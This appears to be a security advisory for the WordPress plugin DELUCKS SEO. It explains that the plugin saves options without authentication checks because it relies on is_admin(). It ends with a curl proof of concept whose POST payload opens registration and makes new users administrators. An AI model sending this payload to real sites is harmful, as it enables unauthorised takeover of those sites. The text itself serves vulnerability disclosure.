DELUCKS SEO [Unauthenticated Options Update]


Plugin DELUCKS SEO doesn’t implement security settings when saving options.

Upon plugin initialization (in each request), it uses the is_admin() function to define if the current request is from a site administrator. If is_admin() returns true (which will do for every request to wp-admin path, even non authenticated), calls the method DPC::saveSettings(). The latest performs no security checks at all before saving various options in DB.

In addition the options are defined dynamically from the POST request, allowing anyone to use a specially crafted POST request to update even core options.


In this proof of concept we change two core options that will open registrations and anyone who registers will be an administrator.

curl '' \
    -d 'dpc_save_settings=1&dpc[realnames][users_can_register]=1&dpc[realnames][default_role]=administrator'